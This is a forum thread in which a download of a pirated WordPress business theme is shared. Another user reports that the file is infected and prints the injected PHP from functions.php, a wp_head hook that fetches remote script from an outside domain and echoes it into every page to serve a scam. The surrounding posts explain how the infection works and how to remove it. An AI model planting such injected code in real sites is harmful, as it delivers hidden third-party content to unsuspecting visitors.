17.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

11-13-2012, 06:38 PM (This post was last modified: 11-13-2012 06:40 PM by magicmastermind.)
Post: #1
[GET] Cleanex - Minimalist Business Themeforest WordPress Theme
Cleanex - Minimalist Business Themeforest WordPress Theme
Cleanex is a simple, clean and minimalist business wordpress theme
suitable for company, business, portfolio and corporate sites. This
template also perfect for blog, portfolio and personal sites.

Demo:
Code:
themeforest.net/item/cleanex-minimalist-business-wordpress-theme/1029018

Download:
Magic Button :
Code:
depositfiles.com/files/zpmq8y8i8
11-13-2012, 11:53 PM
Post: #2
RE:
THE ABOVE FILE IS INFECTED
It contains a wp_head infection

I'm unable to clean and share it now due to time, but will do later
If you need it now, please remove the following code from functions.php near the end of file.

Code:
<?php
function jqueryj_head() {

if(function_exists('curl_init'))
{
$url = "http://www.shigg.com/soft/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
?>

cheers,
Si
11-14-2012, 12:28 AM (This post was last modified: 11-14-2012 12:30 AM by vietguysvn.)
Post: #3
RE:
Hi, simey69. that code is only in functions.php file.
Simple thing is removed it, and will be ok to use, right ??? Or still have something more important, so you can't reupload cleaned version.
11-14-2012, 12:40 AM
Post: #4
RE:
Hi,

Yeah, just remove the bit above and you're clean and safe to use.

Cheers,
Si
11-17-2012, 06:44 AM
Post: #5
RE:
(11-13-2012 11:53 PM)simey69 Wrote:  
THE ABOVE FILE IS INFECTED
It contains a wp_head infection

I'm unable to clean and share it now due to time, but will do later
If you need it now, please remove the following code from functions.php near the end of file.

Code:
function jqueryj_head() {

if(function_exists('curl_init'))
{
$url = "/soft/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
?>

cheers,
Si

thanks for your report
but i need question, ho do you cek this?? are u use anti virus??
i have 30 theme n i need cek every theme from infection

thanks b4
76.gif
11-17-2012, 07:05 PM
Post: #6
RE:
Hi,

I check them manually, but hope to release a scanner soon

Cheers,
Si
11-17-2012, 09:01 PM
Post: #7
RE:
Why would that be an infection ? It is the original code from the developer and it does not harm your server in any way does it ?
11-17-2012, 10:40 PM (This post was last modified: 11-17-2012 10:41 PM by simey69.)
Post: #8
RE:
no, it's not the original code.

the file was tampered with on 13/11/12 at 08:44 according to the archive dates.

The above code was added to pull offsite code from the domain shigg com
this will end up as some crappy cpa scam

After a quick look at this one, it ends up leading to a bit ly link, pointing to a cpahits page

I've cleaned hundreds of these S***** script kiddy scams, including 4 of your recent shares.
this host domain is also common amongst these infections.

it's not aimed to hurt your server, as it delivers code into the page delivered to the viewer.

as of now, it's had over 7k hits in the last 7 days, check it's stats here:

Code:
bitly -dot- com/U6Jsq2+
11-19-2012, 01:00 AM
Post: #9
RE:
hm okay, so im sorry for that one! i pulled the scripts from another board and thought it was the original code!
thank you for the analysis!
11-19-2012, 03:33 AM
Post: #10
RE:
Hi,

No worries, it's easily done - they're written to be spread that way, avoid virus scan detection and look innocent.

Cheers,
Si
60.gif




10.gif